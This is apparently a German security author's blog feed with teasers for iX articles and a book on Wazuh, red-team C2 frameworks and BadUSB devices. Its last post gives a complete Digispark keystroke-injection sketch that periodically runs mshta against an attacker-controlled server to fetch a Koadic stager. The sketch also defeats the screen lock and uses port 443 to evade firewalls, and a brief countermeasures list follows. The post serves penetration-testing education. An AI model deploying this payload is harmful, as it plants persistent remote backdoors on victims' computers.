Weitere Informationen über meinen Beitrag zum Sonderheft findet man hier.

Der Beitrag Ausgabe der iX Special 2025 – Securitytools erschienen erschien zuerst auf .

Die Anleitung führt durch folgende Schritte:

• Vorbereitung des Raspberry Pi 4, meist mit einem aktuellen Raspberry Pi OS (ARM64).
• Installation der benötigten Softwarepakete und Hinzufügen des Wazuh-Repositorys.
• Installation und Konfiguration der Wazuh-Komponenten (z. B. Agent, Server, Dashboard) auf dem Raspberry Pi.
• Starten und Aktivieren der Wazuh-Dienste, damit sie beim Systemstart automatisch laufen.
• Abschließend Zugriff auf das Wazuh Dashboard zur Überwachung und Verwaltung der Sicherheitsereignisse.

Der Blogeintrag hebt hervor, dass die Installation zwar einige Schritte erfordert, aber mit der Anleitung auch für Einsteiger nachvollziehbar ist. Das Ergebnis ist eine kostengünstige, aber leistungsfähige Sicherheitslösung für kleine Netzwerke.

Der Beitrag Wazuh auf einem Raspberry Pi 4 installieren erschien zuerst auf .

Der Beitrag iX 01/2025 – Wazuh: Freie Sicherheitsplattform Wazuh im Einsatz erschien zuerst auf .

Es folgt ein zweiter Teil im nächsten Heft. Viele weitere interessante Artikel finden Sie im aktuellen Heft.

Der Beitrag iX 12/2024 – Wazuh: Unternehmenssicherheit mit Open Source erschien zuerst auf .

In dieser zweiteiligen Artikelserie beschreibe ich, wie das Havoc Framework in einer Red-Team-Kampagne oder einem Penetrationstest zum Einsatz kommen kann. Dieser erste Teil beschäftigt sich mit der Installation, dem Aufbau und dem grundsätzlichen Umgang mit Listenern, Payloads und Modulen.

Im Heft 05/2024 erscheint der zweite Teil des Artikels. Dieses Tutorial gibt einen Überblick über die Möglichkeiten, die Havoc in einem kompromittierten System bietet.

Der Beitrag iX 04/2024 Post-Exploitation-Framework Havoc erschien zuerst auf .

Die Entwickler tauften diese grafische Benutzeroberfläche des Empire-Frameworks Starkiller. Ursprünglich als eigenständiges Programm entwickelt, ist die Software seit 2023 ab der Version 5.2 in den Server integriert und als Webinterface zugänglich.

Lesen Sie meinen neuen Artikel in der iX – Magazin für professionelle IT.

Der Beitrag iX 12/2023 – Pentesting mit der Starkiller-GUI erschien zuerst auf .

Zum Inhalt:

Um effektiv auf Cyber-Angriffe reagieren zu können, ist es unerlässlich, die aktuellen Angriffstechniken des Gegners zu kennen. Nur so ist es möglich, auf komplexe Angriffe adäquat zu reagieren und rechtzeitig geeignete Maßnahmen zu ergreifen. An dieser Stelle kommt die Phase der Post-Exploitation ins Spiel. Sie ist eine Phase des Penetrationstests, die voraussetzt, dass bereits eine Verbindung zwischen Angreifer und Ziel-IT besteht.

Dieses Buch befasst sich mit der Installation und dem Einsatz von Post-Exploitation-Frameworks, die Penetrationstestern helfen, mögliche Angriffsszenarien in einer sicheren Umgebung zu simulieren und Systeme auf bestehende und potenzielle Schwachstellen zu überprüfen.
Es führt durch den Aufbau eines Testsystems und stellt verschiedene Post-Exploitation-Tools wie Metasploit, Koadic, Empire, Covenant, Merlin, Sliver und Mythic vor. Jedes Kapitel gibt einen Überblick über die Eigenschaften, die Installation und den praktischen Einsatz des jeweiligen Frameworks anhand verschiedener Szenarien. Am Ende jedes Kapitels finden Sie Wiederholungsfragen, um Ihr Wissen zu festigen.

Der Beitrag Hacking mit Post Exploitation Frameworks erschien zuerst auf .

Kurze Zeit später schossen weitere Ansätze für Keystroke-Injection- Angriffe wie Pilze aus dem Boden. Besonders beliebt waren in diesem Zusammenhang USB-Geräte, die sich beim Anstecken als USB-Tastatur ausgeben. Der als Skript auf einem Speichermedium abgelegte Schadcode simuliert, dass bestimmte Tasten auf der Tastatur gedrückt werden. Das erlaubt es Befehle so auszuführen, als wären sie von einem legitimen Benutzer eingegeben worden. Ein Eindringling kann diese Art des Angriffs nutzen, um Zugriff auf vertrauliche Informationen zu erlangen oder Schadcode auf einem Computer auszuführen.

Der MalDuino W kommt in einem schlanken Metallgehäuse daher, das mit einer USB-A- und einer USB-C-Schnittstelle ausgestattet ist. Wird er mit einer Stromquelle wie einem PC, einer Powerbank oder einem USB-Netzteil verbunden, baut der Stick einen eigenen WLAN- Access-Point auf, den der Nutzer über ein Webinterface konfigurieren kann.

Lesen Sie den ganzen Artikel in der iX 05/2023.

Der Beitrag iX 05/2023 – BadUSB-Stick mit WLAN erschien zuerst auf .

Wer das englische Wörterbuch bemüht, um das Wort „Covenant“ nachzuschlagen, wird eine Reihe von Übersetzungen finden. Welche Bedeutung der Entwickler Ryan Cobb allerdings im Sinn hatte, wird offenkundig sein Geheimnis bleiben. Hat man sich mit dem Framework aber etwas näher beschäftigt, so wird einem die Aussage Abkommen, Bündnis oder Vertrag hinsichtlich der Kollaborationsfähigkeit der Software plausibel erscheinen. 

Auf der Projektseite beschreiben die Entwickler ihre Anwendung als „.Net Command und Control Framework“, das darauf abzielt, die Angriffsfläche von .Net hervorzuheben. Gleichzeitig verdeutlicht es, wie Microsofts Software als einfache Befehls- und Steuerungsplattform genutzt werden kann, um die Arbeit von Red Teams zu unterstützen.

Schon auf dem ersten Blick fällt die ansprechend gestaltete Weboberfläche ins Auge, die auch Anwender mit minimalen Kenntnissen auf diesem Gebiet den Einstieg erleichtert. Erfahrene Nutzer werden sofort Listener, Launcher und Tasks bereitstellen können, ohne einen Blick in das Wiki zu werfen. 

Covenant bietet viele ähnliche Funktionalitäten wie kommerzielle Post-Exploitation-Frameworks und weist insbesondere Parallelen mit Cobalt Strike auf. Der reichhaltige Funktionsumfang, die einfache Anpassung und die plattformübergreifende Kompatibilität machen es zu einer großartigen Option für Red Teams und Penetrationstester. 

Lesen Sie meinen kompletten Artikel im Magazin für professionelle Informationstechnik iX – 01/2023.

Der Beitrag iX 01/2023 – Post-Exploitation für .NET erschien zuerst auf .

Tatsächlich brauchte es nicht viel, um die Backdoor mittels Keystroke-Injection zu erzeugen. Zu diesem Zweck könnte man mshta.exe verwenden. Diese Datei ist standardmäßig im Windows-Betriebssystem vorhanden und braucht daher nicht erst auf das Zielobjekt übertragen zu werden.

MsHTA steht für Microsoft HTML Application. Dieser Prozess gilt als sicher und stellt normalerweise keine Gefahr für ein Windows-System dar. Die Datei ‚mshta.exe‘ befindet sich standardmäßig im Ordner C:\Windows\System32 und kann problemlos mit Nutzerrechten aufgerufen werden.

Wie läuft der Angriff ab?

Ohne den neuen Lesern die Spannung zu nehmen, kann man verraten, dass mithilfe des Digisparks (1) eine Verbindung zum Angreifer hergestellt wird. Um die Firewall zu umgehen, sollte dies über einen Port geschehen, der für den Verkehr von innen nach außen geöffnet ist. Das könnte z.B. Port 443 sein, der vorrangig für das Surfen im Internet benutzt wird. Das Zielsystem, als Beispiel wird hier ein Windows-10-PC genutzt, ruft die Webseite „http://112.23.137.77:443/eagle“ auf. Im Skript kann man sehen, dass dies automatisch mittels Keystroke-Injection passiert. (IP-Adresse ist fiktiv).

Der Server (2) mit der IP-Adresse 112.23.137.77 nimmt die Verbindung an und stellt eine permanente Verbindung zum Zielobjekt her. Hierzu wird die Software Koadic verwendet, die diese Verbindungen als „Zombies“ verwaltet. Ich habe das Post-Exploitation-Framework bereits in unserem Buch, in einem Artikel der iX und auf dieser Webseite ausführlich vorgestellt.

Welche „Hürden“ müssen überwunden werden.

1. Keystroke-Injektion funktioniert natürlich nur, wenn ein Nutzer sich im System angemeldet hat und den Bildschirm frei für Eingaben macht. Ist er gesperrt, so bring z.B. das Tastenkürzel Windows+R, welches den „Ausführen-Dialog“ öffnet, nicht den gewünschten Effekt.
2. Ist der PC einmal offen, so kann es sein, dass der Nutzer das Gerät nach einer gewissen Zeit wieder verlässt. In der Regel greift dann der Bildschirmschoner, der das Gerät nach einer vorgegebenen Zeit automatisch sperrt.
3. Ist das Zielsystem ausgeschaltet, so kann selbstverständlich keine Verbindung zum Angreifer aufgebaut werden. Hier müssen wir gewährleisten, dass nach dem Einschalten und während der Nutzung immer wieder neue Verbindungen zum Angreifer aufgebaut und neue „Zombies“ erstellt werden.

Digispark – „Der Wolf im Schafspelz“

Digispark ist eine  Entwicklungsplatine auf Basis eines Attiny85. Er lässt sich direkt mit dem USB-Port eines Rechners verbinden und mit der Arduino-Entwicklungsumgebung  programmieren.

Technische Details:

• Unterstützt die Arduino IDE (erhältlich für OSX/Win/Linux)
• Stromversorgung über USB oder eine externe Quelle – 5V oder 7-35V 
• On-board 500mA 5V Regler
• Built-in USB
• 6 I/O Pins 
• 8kB Flash-Speicher (ca. 6kB effektiv verfügbar)
• I2C und SPI
• PWM auf 3 Pins
• ADC auf 4 Pins
• Power LED und Test/Status LED (auf Pin 0)

Arduino Entwicklungsumgebung

In diesem Beitrag habe ich gezeigt, wie Sie die Arduino Entwicklungsumgebung für den Digispark in einem Windows-Betriebssystem einrichten. Wer lieber mit Linux arbeitet, wird im Buch eine entsprechende Anleitung finden.

Achtung: Da die Originaldateien auf das US-Tastaturlayout zugeschnitten sind, müssen Nutzer einer deutschen Tastatur folgende Dateien austauschen:

• DigiKeyboard.h
• scancode-ascii-table.h

Sie werden diese Dateien ja nach Betriebssystem und Installation in den Nutzerdaten finden. In meiner Entwicklungsumgebung unter Windows wurde ich hier fündig:

C:\Users\frank\AppData\Local\Arduino15\packages\digistump\hardware\avr\1.6.7\libraries\DigisparkKeyboard

Laden Sie die Dateien für ein deutsches Tastaturlayout hier herunter.

Dieses Skript soll helfen, die Probleme zu lösen

Die Variable „interval“ gewährleistet, dass das Zielsystem alle 30 Minuten eine neue Verbindung zum Angreifer aufnimmt. Die Werte sind in Millisekunden anzugeben.

Wir gehen die diesem Beispiel davon aus, dass der Bildschirm nach ca. zwei Minuten Inaktivität, automatisch gesperrt wird. Wenn jede Minute etwas auf der Tastatur passiert, dann sollte dies nicht der Fall sein. Die Variable „antiscreensaver“ legt fest, in welchem Zeitintervall, zu diesem Zweck, die Leertasten und Backspacetaste „gedrückt“ werden. Dies hat zur Folge, dass der Bildschirmschoner nicht aktiviert wird und weitere Verbindungsaufnahmen stattfinden können. Nach Möglichkeit sollten Sie diese Zeitspanne, je nach den Einstellungen auf dem Zielsystem, etwas größer wählen.

#include "DigiKeyboard.h"

long previousMillis = 0;
long interval = 1800000;        //  30 minutes
long antiscreensaver = 60000;   //   1 minute

void setup() {
  // don't need to set anything up to use DigiKeyboard
}

void loop() {
  DigiKeyboard.sendKeyStroke(0);
  unsigned long currentMillis = millis();
  if(currentMillis - previousMillis > interval) {
     DigiKeyboard.delay(2000);
     DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
     DigiKeyboard.delay(2000);
     DigiKeyboard.println("cmd /c start /MIN mshta http://112.23.137.77:443/eagle");
     previousMillis = currentMillis;
  }
  DigiKeyboard.delay(2000);
  DigiKeyboard.sendKeyStroke(KEY_SPACE);
  DigiKeyboard.sendKeyStroke(KEY_BACKSPACE);
  DigiKeyboard.delay(antiscreensaver);
}

Post-Exploitation-Framework einsetzen

Mit Koadic haben Sie nun alle Möglichkeiten auf dem Zielsystem zu agieren. Das Werkzeug liefert Module, um auf Zielsystem zuzugreifen, Daten zu kopieren oder die Rechte zu erweitern.

Die diesem Beispiel wurde ein Kommando-Shell geöffnet und der Dateninhalt angezeigt.

Gegenmaßnahmen

Es ist im täglichen Betrieb nicht leicht, einen Digispark zu finden, der in eine freie USB-Schnittstelle gesteckt wurde. Regelmäßige Kontrollen würden hier natürlich helfen.
Außerdem ist das oben gezeigte Skript nicht perfekt. Auch wenn jemand mehr „Herzblut“ in die Sache steckt, wird es immer ein Keystroke-Injection-Angriff bleiben. Dies bedeutet, dass der Angreifer Befehle ausführen wird, die möglicherweise auf dem Bildschirm sichtbar sind.
Wenn der Bildschirmschoner nicht startet oder der Bildschirm nicht automatisch gesperrt wird, sollten der Nutzer stutzig werden und der Sache nachgehen.
Ein Virenschutzprogramm auf einem Windows-System könnte eventuell den Angriff erkennen und abwehren.
Wer einen Proxy-Server für die Verbindung ins Internet nutzt und hier sogar eine Authentifizierung gewählt hat, sollte ebenfalls auf der sicheren Seite sein.

Das folgende Video zeigt, was vom Angriff für den Nutzer zu sehen ist und welche Schritte ein Angreifer unternimmt, um wichtige Dateien herunterzuladen:

Der Beitrag Backdoor Roman – Spoiler Alarm! erschien zuerst auf .